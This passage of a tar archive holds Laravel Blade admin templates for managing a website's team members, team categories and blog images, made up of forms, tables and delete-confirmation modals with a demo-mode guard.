route('blog.destroy_image', $blog->id) }}" method="POST"> @method('DELETE') @csrf <button type="button" class="btn btn-danger" data-dismiss="modal">{{ __('content.cancel') }}</button> <button type="submit" class="btn btn-success">{{ __('content.yes_delete_it') }}</button> </form> </div> </div> </div> </div> <!-- Modal --> <div class="modal fade" id="deleteImageModal2{{ $blog->id }}" tabindex="-1" role="dialog" aria-labelledby="messageModalCenterTitle" aria-hidden="true"> <div class="modal-dialog modal-dialog-centered modal-sm" role="document"> <div class="modal-content"> <div class="modal-header"> <h5 class="modal-title" id="messageModalCenterTitle">{{ __('content.delete') }}</h5> <button type="button" class="close" data-dismiss="modal" aria-label="{{ __('content.close') }}"> <span aria-hidden="true">×</span> </button> </div> <div class="modal-body text-center"> {{ __('content.you_wont_be_able_to_revert_this') }} </div> <div class="modal-footer"> <form class="d-inline-block" action="{{ route('blog.destroy_image', $blog->id) }}" method="POST"> @method('DELETE') @csrf <button type="button" class="btn btn-danger" data-dismiss="modal">{{ __('content.cancel') }}</button> <button type="submit" class="btn btn-success">{{ __('content.yes_delete_it') }}</button> </form> </div> </div> </div> </div> </div> </div> </div> <!-- end row --> @endsection �����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������views/admin/demo_mode/demo-mode.blade.php�����������������������������������������������������������0000644�����������������00000000141�14765366573�0014370 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������<form action="{{ route('admin.demo_mode') }}" method="POST" enctype="multipart/form-data"> @csrf�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������views/admin/team/create.blade.php�������������������������������������������������������������������0000644�����������������00000016457�14765366573�0013004 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������@extends('layouts.admin.master') @section('content') <!-- Form row --> <div class="row"> <div class="col-xl-12 box-margin height-card"> <div class="card card-body"> <h4 class="card-title">{{ __('content.add_team') }} <!-- Button --> <a id="hoverButton" class="iyzi-btn"><i class="fas fa-camera"></i> {{ __('content.view_draft') }}</a> <!-- Modal --> <div id="imageModal" class="border border-success iyzi-modal"> <img class="img-fluid " src="{{ asset('uploads/img/dummy/style/team-style1.jpg') }}" alt="draft image"> </div> </h4> @if ($demo_mode == "on") <!-- Include Alert Blade --> @include('admin.demo_mode.demo-mode') @else <form action="{{ route('team.store') }}" method="POST" enctype="multipart/form-data"> @csrf @endif <input name="style" type="hidden" value="{{ $style }}"> <div class="row"> <div class="col-md-12"> <div class="form-group"> <label for="name">{{ __('content.name') }} <span class="text-red">*</span></label> <input id="name" name="name" type="text" class="form-control" required> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="job">{{ __('content.job') }}</label> <input id="job" name="job" type="text" class="form-control"> </div> </div> <div class="col-md-12"> <div class="form-group form-group-default"> <label for="category">{{ __('content.categories') }} <span class="text-red">*</span></label> <select class="form-control" name="category_id" id="category" required> @foreach($categories as $category) <option value="{{$category->id}}">{{$category->category_name}}</option> @endforeach </select> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="section_image">{{ __('content.image') }} ({{ __('content.size') }} 200 x 200) (.svg, .jpg, .jpeg, .png, .webp, .gif)</label> <input id="section_image" name="section_image" type="file" class="form-control-file"> <small class="form-text text-muted">{{ __('content.please_use_recommended_sizes') }}</small> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="facebook_url">{{ __('content.facebook_url') }} </label> <input id="facebook_url" name="facebook_url" type="text" class="form-control"> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="twitter_url">{{ __('content.twitter_url') }} </label> <input id="twitter_url" name="twitter_url" type="text" class="form-control"> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="instagram_url">{{ __('content.instagram_url') }} </label> <input id="instagram_url" name="instagram_url" type="text" class="form-control"> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="youtube_url">{{ __('content.youtube_url') }} </label> <input id="youtube_url" name="youtube_url" type="text" class="form-control"> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="linkedin_url">{{ __('content.linkedin_url') }} </label> <input id="linkedin_url" name="linkedin_url" type="text" class="form-control"> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="order">{{ __('content.order') }}</label> <input type="number" name="order" class="form-control" id="order" value="0"> </div> </div> <div class="col-xl-12"> <div class="form-group"> <label for="status" class="col-form-label">{{ __('content.status') }} </label> <select class="form-control" name="status" id="status"> <option value="published" selected>{{ __('content.select_your_option') }}</option> <option value="published">{{ __('content.published') }}</option> <option value="draft">{{ __('content.draft') }}</option> </select> </div> </div> <div class="col-md-12"> <div class="form-group"> <small class="form-text text-muted">{{ __('content.required_fields') }}</small> </div> </div> <div class="col-md-12"> <div class="form-group"> <button type="submit" class="btn btn-primary">{{ __('content.submit') }}</button> </div> </div> </div> </form> </div> </div> </div> <!-- end row --> @endsection �����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������views/admin/team/category/create.blade.php����������������������������������������������������������0000644�����������������00000027230�14765366573�0014610 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������@extends('layouts.admin.master') @section('content') <div class="row"> <div class="col-12 box-margin"> <div class="card"> <div class="card-body"> <div class="d-flex justify-content-between align-items-center mb-20"> <h6 class="card-title mb-0">{{ __('content.categories') }}</h6> <div> <button type="button" class="btn btn-primary float-right mb-3" data-toggle="modal" data-target="#categoryModal">+ {{ __('content.add_category') }}</button> </div> </div> @if (count($categories) > 0) <div> <input id="check_all" type="checkbox" onclick="showHideDeleteButton(this)"> <label for="check_all">{{ __('content.all') }}</label> <a id="deleteChecked" class="ml-2" href="#" data-toggle="modal" data-target="#deleteCheckedModal"> <i class="fa fa-trash text-danger font-18"></i> </a> </div> @if ($demo_mode == "on") <!-- Include Alert Blade --> @include('admin.demo_mode.demo-mode') @else <form onsubmit="return btnCheckListGet()" action="{{ route('team-category.destroy_checked') }}" method="POST"> @method('DELETE') @csrf @endif <input type="hidden" id="checked_lists" name="checked_lists" value=""> <!-- Modal --> <div class="modal fade" id="deleteCheckedModal" tabindex="-1" role="dialog" aria-labelledby="deleteCheckedModalCenterTitle" aria-hidden="true"> <div class="modal-dialog modal-dialog-centered modal-sm" role="document"> <div class="modal-content"> <div class="modal-header"> <h5 class="modal-title" id="deleteCheckedModalCenterTitle">{{ __('content.delete') }}</h5> <button type="button" class="close" data-dismiss="modal" aria-label="{{ __('content.close') }}"> <span aria-hidden="true">×</span> </button> </div> <div class="modal-body text-center"> {{ __('content.delete_selected') }} </div> <div class="modal-footer"> <button type="button" class="btn btn-danger" data-dismiss="modal">{{ __('content.cancel') }}</button> <button onclick="btnCheckListGet()" type="submit" class="btn btn-success">{{ __('content.yes_delete_it') }}</button> </div> </div> </div> </div> </form> <table id="basic-datatable" class="table table-striped dt-responsive nowrap w-100"> <thead> <tr> <th scope="col">#</th> <th>{{ __('content.category_name') }}</th> <th>{{ __('content.order') }}</th> <th>{{ __('content.status') }}</th> <th class="custom-width-action">{{ __('content.action') }}</th> </tr> </thead> <tbody> @php $desc = count($categories); $asc=0; @endphp @foreach ($categories as $category) <tr> <td> <input name="check_list[]" type="checkbox" value="{{ $category->id }}" onclick="showHideDeleteButton2(this)"> <span class="d-none">{{ $asc++ }}{{ $desc-- }}</span> </td> <td>{{ $category->category_name }}</td> <td>{{ $category->order }}</td> <td> @if($category->status == 0) <span class="badge badge-danger">{{ __('content.disable') }}</span> @else <span class="badge badge-success">{{ __('content.enable') }}</span> @endif </td> <td> <div> <a href="{{ route('team-category.edit', $category->id) }}" class="mr-2"> <i class="fa fa-edit text-info font-18"></i> </a> <a href="#" data-toggle="modal" data-target="#deleteModel{{ $category->id }}"> <i class="fa fa-trash text-danger font-18"></i> </a> </div> </td> </tr> <!-- Modal --> <div class="modal fade" id="deleteModel{{ $category->id }}" tabindex="-1" role="dialog" aria-labelledby="exampleModalCenterTitle" aria-hidden="true"> <div class="modal-dialog modal-dialog-centered modal-sm" role="document"> <div class="modal-content"> <div class="modal-header"> <h5 class="modal-title" id="exampleModalCenterTitle">{{ __('content.delete') }}</h5> <button type="button" class="close" data-dismiss="modal" aria-label="{{ __('content.close') }}"> <span aria-hidden="true">×</span> </button> </div> <div class="modal-body text-center"> {{ __('content.you_wont_be_able_to_revert_this') }} </div> <div class="modal-footer"> @if ($demo_mode == "on") <!-- Include Alert Blade --> @include('admin.demo_mode.demo-mode') @else <form class="d-inline-block" action="{{ route('team-category.destroy', $category->id) }}" method="POST"> @method('DELETE') @csrf @endif <button type="button" class="btn btn-danger" data-dismiss="modal">{{ __('content.cancel') }}</button> <button type="submit" class="btn btn-success">{{ __('content.yes_delete_it') }}</button> </form> </div> </div> </div> </div> @endforeach </tbody> </table> @else <span>{{ __('content.not_yet_created') }}</span> @endif </div> <!-- end card body--> </div> <!-- end card --> </div><!-- end col--> </div><!-- end row--> <div class="modal fade" id="categoryModal" tabindex="-1" role="dialog" aria-labelledby="categoryModalLabel" aria-modal="false"> <div class="modal-dialog modal-md"> <div class="modal-content"> <div class="modal-header"> <h5 class="modal-title mt-0 font-16" id="categoryModalLabel">{{ __('content.add_new') }}</h5> <button type="button" class="close" data-dismiss="modal" aria-hidden="true">×</button> </div> <div class="modal-body"> @if ($demo_mode == "on") <!-- Include Alert Blade --> @include('admin.demo_mode.demo-mode') @else <form action="{{ route('team-category.store') }}" method="POST"> @csrf @endif <div class="row"> <div class="col-md-12"> <div class="form-group"> <label for="category_name">{{ __('content.category_name') }} <span class="text-red">*</span></label> <input type="text" name="category_name" class="form-control" id="category_name" required> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="order">{{ __('content.order') }}</label> <input type="number" name="order" class="form-control" id="order" value="0"> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="status" class="col-form-label">{{ __('content.status') }}</label> <select name="status" class="form-control" id="status"> <option value="1" selected>{{ __('content.select_your_option') }}</option> <option value="1">{{ __('content.enable') }}</option> <option value="0">{{ __('content.disable') }}</option> </select> </div> </div> <div class="col-md-12"> <div class="form-group"> <small class="form-text text-muted">{{ __('content.required_fields') }}</small> </div> </div> </div> <button type="submit" class="btn btn-sm btn-primary">{{ __('content.submit') }}</button> </form> </div> </div><!-- /.modal-content --> </div><!-- /.modal-dialog --> </div><!-- /.modal --> @endsection ������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������views/admin/team/category/edit.blade.php������������������������������������������������������������0000644�����������������00000006545�14765366573�0014300 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������@extends('layouts.admin.master') @section('content') <!-- Include Alert Blade --> @include('admin.alert.alert') <!-- Form row --> <div class="row"> <div class="col-xl-12 box-margin height-card"> <div class="card card-body"> <div class="d-md-flex justify-content-between align-items-center mb-20"> <h4 class="card-title">{{ __('content.edit_category') }}</h4> <div> <a href="{{ url()->previous() }}" class="btn btn-primary"><i class="fas fa-angle-left"></i> {{ __('content.back') }}</a> </div> </div> @if ($demo_mode == "on") <!-- Include Alert Blade --> @include('admin.demo_mode.demo-mode') @else <form action="{{ route('team-category.update', $category->id) }}" method="POST"> @method('PUT') @csrf @endif <div class="row"> <div class="col-md-12"> <div class="form-group"> <label for="category_name">{{ __('content.category_name') }} <span class="text-red">*</span></label> <input type="text" name="category_name" class="form-control" id="category_name" value="{{ $category->category_name }}"> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="order">{{ __('content.order') }}</label> <input type="number" name="order" class="form-control" id="order" value="{{ $category->order }}" required> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="status" class="col-form-label">{{ __('content.status') }}</label> <select class="form-control" name="status" id="status"> <option value="1" selected>{{ __('content.select_your_option') }}</option> <option value="1" {{ $category->status == 1 ? 'selected' : '' }}>{{ __('content.enable') }}</option> <option value="0" {{ $category->status == 0 ? 'selected' : '' }}>{{ __('content.disable') }}</option> </select> </div> </div> <div class="col-md-12"> <div class="form-group"> <small class="form-text text-muted">{{ __('content.required_fields') }}</small> </div> </div> <div class="col-md-12"> <button type="submit" class="btn btn-primary mr-2">{{ __('content.submit') }}</button> </div> </div> </form> </div> </div> </div> <!-- end row --> @endsection �����������������������������������������������������������������������������������������������������������������������������������������������������������views/admin/team/index.blade.php��������������������������������������������������������������������0000644�����������������00000061310�14765366573�0012634 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������@extends('layouts.admin.master') @section('content') <div class="row"> <div class="col-12 box-margin"> <div class="card"> <div class="card-body"> <div class="d-md-flex justify-content-between align-items-center mb-20"> <h4 class="card-title mb-0">{{ __('content.teams') }} <div class="btn-group"> <button type="button" class="btn btn-primary btn-sm dropdown-toggle" data-toggle="dropdown" aria-haspopup="true" aria-expanded="false"> {{ __('content.'.$style) }} </button> <div class="dropdown-menu"> <a class="dropdown-item" href="{{ route('team.index', ['style' => 'style1']) }}">{{ __('content.style1') }}</a> </div> </div> <!-- Button --> <a id="hoverButton" class="iyzi-btn"><i class="fas fa-camera"></i> {{ __('content.view_draft') }}</a> <!-- Modal --> <div id="imageModal" class="border border-success iyzi-modal"> <img class="img-fluid " src="{{ asset('uploads/img/dummy/style/team-'.$style.'.jpg') }}" alt="draft image"> </div> </h4> <div> <button type="button" class="btn btn-primary mb-3 mr-2" data-toggle="modal" data-target="#teamSectionModal">{{ __('content.section_title_and_description') }}</button> <a href="{{ url('admin/team/create/'.$style) }}" class="btn btn-primary float-right mb-3">+ {{ __('content.add_team') }}</a> </div> </div> @if (count($teams) > 0) <div> <input id="check_all" type="checkbox" onclick="showHideDeleteButton(this)"> <label for="check_all">{{ __('content.all') }}</label> <a id="deleteChecked" class="ml-2" href="#" data-toggle="modal" data-target="#deleteCheckedModal"> <i class="fa fa-trash text-danger font-18"></i> </a> </div> @if ($demo_mode == "on") <!-- Include Alert Blade --> @include('admin.demo_mode.demo-mode') @else <form onsubmit="return btnCheckListGet()" action="{{ route('team.destroy_checked') }}" method="POST"> @method('DELETE') @csrf @endif <input type="hidden" id="checked_lists" name="checked_lists" value=""> <!-- Modal --> <div class="modal fade" id="deleteCheckedModal" tabindex="-1" role="dialog" aria-labelledby="deleteCheckedModalCenterTitle" aria-hidden="true"> <div class="modal-dialog modal-dialog-centered modal-sm" role="document"> <div class="modal-content"> <div class="modal-header"> <h5 class="modal-title" id="deleteCheckedModalCenterTitle">{{ __('content.delete') }}</h5> <button type="button" class="close" data-dismiss="modal" aria-label="{{ __('content.close') }}"> <span aria-hidden="true">×</span> </button> </div> <div class="modal-body text-center"> {{ __('content.delete_selected') }} </div> <div class="modal-footer"> <button type="button" class="btn btn-danger" data-dismiss="modal">{{ __('content.cancel') }}</button> <button onclick="btnCheckListGet()" type="submit" class="btn btn-success">{{ __('content.yes_delete_it') }}</button> </div> </div> </div> </div> </form> <table id="basic-datatable" class="table table-striped dt-responsive w-100"> <thead> <tr> <th scope="col">#</th> <th>{{ __('content.name') }}</th> <th>{{ __('content.category_name') }}</th> <th>{{ __('content.order') }}</th> <th class="custom-width-action">{{ __('content.action') }}</th> </tr> </thead> <tbody> @php $desc = count($teams); $asc=0; @endphp @foreach ($teams as $team) <tr> <td> <input name="check_list[]" type="checkbox" value="{{ $team->id }}" onclick="showHideDeleteButton2(this)"> <span class="d-none">{{ $asc++ }}{{ $desc-- }}</span> </td> <td>{{ $team->name }}</td> <td>{{ $team->category_name }}</td> <td>{{ $team->order }}</td> <td> <div> <a href="{{ route('team.edit', $team->id) }}" class="mr-2"> <i class="fa fa-edit text-info font-18"></i> </a> <a href="#" data-toggle="modal" data-target="#deleteModal{{ $team->id }}"> <i class="fa fa-trash text-danger font-18"></i> </a> </div> </td> </tr> <!-- Modal --> <div class="modal fade" id="deleteModal{{ $team->id }}" tabindex="-1" role="dialog" aria-labelledby="counterModalCenterTitle" aria-hidden="true"> <div class="modal-dialog modal-dialog-centered modal-sm" role="document"> <div class="modal-content"> <div class="modal-header"> <h5 class="modal-title" id="counterModalCenterTitle">{{ __('content.delete') }}</h5> <button type="button" class="close" data-dismiss="modal" aria-label="{{ __('content.close') }}"> <span aria-hidden="true">×</span> </button> </div> <div class="modal-body text-center"> {{ __('content.you_wont_be_able_to_revert_this') }} </div> <div class="modal-footer"> @if ($demo_mode == "on") <!-- Include Alert Blade --> @include('admin.demo_mode.demo-mode') @else <form class="d-inline-block" action="{{ route('team.destroy', $team->id) }}" method="POST"> @method('DELETE') @csrf @endif <button type="button" class="btn btn-danger" data-dismiss="modal">{{ __('content.cancel') }}</button> <button type="submit" class="btn btn-success">{{ __('content.yes_delete_it') }}</button> </form> </div> </div> </div> </div> @endforeach </tbody> </table> @else <span>{{ __('content.not_yet_created') }}</span> @endif </div> <!-- end card body--> </div> <!-- end card --> </div><!-- end col--> </div><!-- end row--> <div class="modal fade" id="teamSectionModal" tabindex="-1" role="dialog" aria-labelledby="teamSectionModalLabel" aria-modal="false"> <div class="modal-dialog modal-md"> <div class="modal-content"> <div class="modal-header"> <h5 class="modal-title mt-0 font-16" id="teamSectionModalLabel">{{ __('content.section_title_and_description') }}</h5> <button type="button" class="close" data-dismiss="modal" aria-hidden="true">×</button> </div> <div class="modal-body"> @if (isset($team_section)) @if ($demo_mode == "on") <!-- Include Alert Blade --> @include('admin.demo_mode.demo-mode') @else <form action="{{ route('team-section.update', $team_section->id) }}" method="POST" enctype="multipart/form-data"> @method('PUT') @csrf @endif <input name="style" type="hidden" value="{{ $style }}"> <div class="row"> <div class="col-md-12"> <div class="form-group"> <label for="section_title">{{ __('content.section_title') }}</label> <input type="text" name="section_title" class="form-control" id="section_title" value="{{ $team_section->section_title }}"> <small class="form-text text-muted">{{ __('content.recommended_tags') }} <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('a', 'section_title')">{{ __('<a href="">') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('br', 'section_title')">{{ __('<br>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('b', 'section_title')">{{ __('<b>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('i', 'section_title')">{{ __('<i>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('span', 'section_title')">{{ __('<span>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('p', 'section_title')">{{ __('<p>') }}</small> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="title">{{ __('content.title') }}</label> <input type="text" name="title" class="form-control" id="title" value="{{ $team_section->title }}"> <small class="form-text text-muted">{{ __('content.recommended_tags') }} <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('a', 'title')">{{ __('<a href="">') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('br', 'title')">{{ __('<br>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('b', 'title')">{{ __('<b>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('i', 'title')">{{ __('<i>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('span', 'title')">{{ __('<span>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('p', 'title')">{{ __('<p>') }}</small> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="button_name">{{ __('content.button_name') }}</label> <input type="text" name="button_name" class="form-control" id="button_name" value="{{ $team_section->button_name }}"> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="button_url">{{ __('content.button_url') }}</label> <input type="text" name="button_url" class="form-control" id="button_url" value="{{ $team_section->button_url }}"> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="section_item">{{ __('content.section_item') }}</label> <input type="number" name="section_item" class="form-control" id="section_item" value="{{ $team_section->section_item }}"> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="paginate_item">{{ __('content.paginate_item') }}</label> <input type="number" name="paginate_item" class="form-control" id="paginate_item" value="{{ $team_section->paginate_item }}"> </div> </div> </div> <button type="submit" class="btn btn-sm btn-primary mr-2">{{ __('content.submit') }}</button> <a href="#" class="btn btn-sm btn-primary" data-toggle="modal" data-target="#teamSectionDestroyModal{{ $team_section->id }}"> <i class="fa fa-trash"></i> {{ __('content.reset') }} </a> </form> <!-- Modal --> <div class="modal fade" id="teamSectionDestroyModal{{ $team_section->id }}" tabindex="-1" role="dialog" aria-labelledby="teamSectionDestroyModalCenterTitle" aria-hidden="true"> <div class="modal-dialog modal-dialog-centered modal-sm" role="document"> <div class="modal-content"> <div class="modal-header"> <h5 class="modal-title" id="teamSectionDestroyModalCenterTitle">{{ __('content.delete') }}</h5> <button type="button" class="close" data-dismiss="modal" aria-label="{{ __('content.close') }}"> <span aria-hidden="true">×</span> </button> </div> <div class="modal-body text-center"> {{ __('content.you_wont_be_able_to_revert_this') }} </div> <div class="modal-footer"> <form class="d-inline-block" action="{{ route('team-section.destroy', $team_section->id) }}" method="POST"> @method('DELETE') @csrf <button type="button" class="btn btn-danger" data-dismiss="modal">{{ __('content.cancel') }}</button> <button type="submit" class="btn btn-success">{{ __('content.yes_delete_it') }}</button> </form> </div> </div> </div> </div> @else @if ($demo_mode == "on") <!-- Include Alert Blade --> @include('admin.demo_mode.demo-mode') @else <form action="{{ route('team-section.store') }}" method="POST" enctype="multipart/form-data"> @csrf @endif <input name="style" type="hidden" value="{{ $style }}"> <div class="row"> <div class="col-md-12"> <div class="form-group"> <label for="section_title">{{ __('content.section_title') }}</label> <input type="text" name="section_title" class="form-control" id="section_title"> <small class="form-text text-muted">{{ __('content.recommended_tags') }} <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('a', 'section_title')">{{ __('<a href="">') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('br', 'section_title')">{{ __('<br>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('b', 'section_title')">{{ __('<b>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('i', 'section_title')">{{ __('<i>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('span', 'section_title')">{{ __('<span>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('p', 'section_title')">{{ __('<p>') }}</small> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="title">{{ __('content.title') }}</label> <input type="text" name="title" class="form-control" id="title"> <small class="form-text text-muted">{{ __('content.recommended_tags') }} <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('a', 'title')">{{ __('<a href="">') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('br', 'title')">{{ __('<br>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('b', 'title')">{{ __('<b>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('i', 'title')">{{ __('<i>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('span', 'title')">{{ __('<span>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('p', 'title')">{{ __('<p>') }}</small> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="button_name">{{ __('content.button_name') }}</label> <input type="text" name="button_name" class="form-control" id="button_name"> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="button_url">{{ __('content.button_url') }}</label> <input type="text" name="button_url" class="form-control" id="button_url"> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="section_item">{{ __('content.section_item') }}</label> <input type="number" name="section_item" class="form-control" id="section_item" value="3"> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="paginate_item">{{ __('content.paginate_item') }}</label> <input type="number" name="paginate_item" class="form-control" id="paginate_item" value="12"> </div> </div> </div> <button type="submit" class="btn btn-sm btn-primary">{{ __('content.submit') }}</button> </form> @endif </div> </div><!-- /.modal-content --> </div><!-- /.modal-dialog --> </div><!-- /.modal --> @endsection ������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������views/admin/team/edit.blade.php���������������������������������������������������������������������0000644�����������������00000027756�14765366573�0012472 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������@extends('layouts.admin.master') @section('content') <!-- Form row --> <div class="row"> <div class="col-xl-12 box-margin height-card"> <div class="card card-body"> <div class="d-md-flex justify-content-between align-items-center mb-20"> <h4 class="card-title">{{ __('content.edit_team') }} <!-- Button --> <a id="hoverButton" class="iyzi-btn"><i class="fas fa-camera"></i> {{ __('content.view_draft') }}</a> <!-- Modal --> <div id="imageModal" class="border border-success iyzi-modal"> <img class="img-fluid " src="{{ asset('uploads/img/dummy/style/team-style1.jpg') }}" alt="draft image"> </div> </h4> <div> <a href="{{ url()->previous() }}" class="btn btn-primary"><i class="fas fa-angle-left"></i> {{ __('content.back') }}</a> </div> </div> @if ($demo_mode == "on") <!-- Include Alert Blade --> @include('admin.demo_mode.demo-mode') @else <form action="{{ route('team.update', $team->id) }}" method="POST" enctype="multipart/form-data"> @method('PUT') @csrf @endif <input name="style" type="hidden" value="{{ $team->style }}"> <div class="row"> <div class="col-md-12"> <div class="form-group"> <label for="name">{{ __('content.name') }} <span class="text-red">*</span></label> <input type="text" name="name" class="form-control" id="name" value="{{ $team->name }}" required> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="job">{{ __('content.job') }}</label> <input id="job" name="job" type="text" class="form-control" value="{{ $team->job }}"> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="category">{{ __('content.categories') }} <span class="text-red">*</span></label> <select class="form-control" name="category_id" id="category" required> @foreach ($categories as $category) <option value="{{ $category->id}}" {{ $category->id == $team->category_id ? 'selected' : '' }}>{{ $category->category_name }}</option> @endforeach </select> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="section_image">{{ __('content.thumbnail') }} ({{ __('content.size') }} 200 x 200) (.svg, .jpg, .jpeg, .png, .webp, .gif)</label> <input type="file" name="section_image" class="form-control-file" id="section_image"> <small class="form-text text-muted">{{ __('content.please_use_recommended_sizes') }}</small> </div> <div class="height-card box-margin"> <div class="card"> <div class="card-body"> <div class="avatar-area text-center"> <div class="media"> @if (!empty($team->section_image)) <a class="d-block mx-auto" href="#" data-toggle="tooltip" data-placement="top" data-original-title="{{ __('content.current_image') }}"> <img src="{{ asset('uploads/img/team/'.$team->section_image) }}" alt="image" class="rounded w-25"> </a> @else <a class="d-block mx-auto" href="#" data-toggle="tooltip" data-placement="top" data-original-title="{{ __('content.not_yet_created') }}"> <img src="{{ asset('uploads/img/dummy/no-image.jpg') }}" alt="no image" class="rounded w-25"> </a> @endif </div> @if (!empty($team->section_image)) <a class="mt-3 d-block" href="#" data-toggle="modal" data-target="#deleteImageModal{{ $team->id }}"> <i class="fa fa-trash text-danger font-18"></i> </a> @endif </div> <!--end card-body--> </div> </div> <!--end card--> </div> <!--end col--> </div> <div class="col-md-12"> <div class="form-group"> <label for="facebook_url">{{ __('content.facebook_url') }} </label> <input id="facebook_url" name="facebook_url" type="text" class="form-control" value="{{ $team->facebook_url }}"> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="twitter_url">{{ __('content.twitter_url') }} </label> <input id="twitter_url" name="twitter_url" type="text" class="form-control" value="{{ $team->twitter_url }}"> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="instagram_url">{{ __('content.instagram_url') }} </label> <input id="instagram_url" name="instagram_url" type="text" class="form-control" value="{{ $team->instagram_url }}"> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="youtube_url">{{ __('content.youtube_url') }} </label> <input id="youtube_url" name="youtube_url" type="text" class="form-control" value="{{ $team->youtube_url }}"> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="linkedin_url">{{ __('content.linkedin_url') }} </label> <input id="linkedin_url" name="linkedin_url" type="text" class="form-control" value="{{ $team->linkedin_url }}"> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="order">{{ __('content.order') }}</label> <input type="number" name="order" class="form-control" id="order" value="{{ $team->order }}"> </div> </div> <div class="col-xl-12"> <div class="form-group"> <label for="status" class="col-form-label">{{ __('content.status') }} </label> <select class="form-control" name="status" id="status"> <option value="published" selected>{{ __('content.select_your_option') }}</option> <option value="published" {{ $team->status == 'published' ? 'selected' : '' }}>{{ __('content.published') }}</option> <option value="draft" {{ $team->status == 'draft' ? 'selected' : '' }}>{{ __('content.draft') }}</option> </select> </div> </div> <div class="col-md-12"> <div class="form-group"> <small class="form-text text-muted">{{ __('content.required_fields') }}</small> </div> </div> <div class="col-md-12"> <div class="form-group"> <button type="submit" class="btn btn-primary">{{ __('content.submit') }}</button> </div> </div> </div> </form> <!-- Modal --> <div class="modal fade" id="deleteImageModal{{ $team->id }}" tabindex="-1" role="dialog" aria-labelledby="deleteImageModalCenterTitle" aria-hidden="true"> <div class="modal-dialog modal-dialog-centered modal-sm" role="document"> <div class="modal-content"> <div class="modal-header"> <h5 class="modal-title" id="deleteImageModalCenterTitle">{{ __('content.delete') }}</h5> <button type="button" class="close" data-dismiss="modal" aria-label="{{ __('content.close') }}"> <span aria-hidden="true">×</span> </button> </div> <div class="modal-body text-center"> {{ __('content.you_wont_be_able_to_revert_this') }} </div> <div class="modal-footer"> <form class="d-inline-block" action="{{ route('team.destroy_image', $team->id) 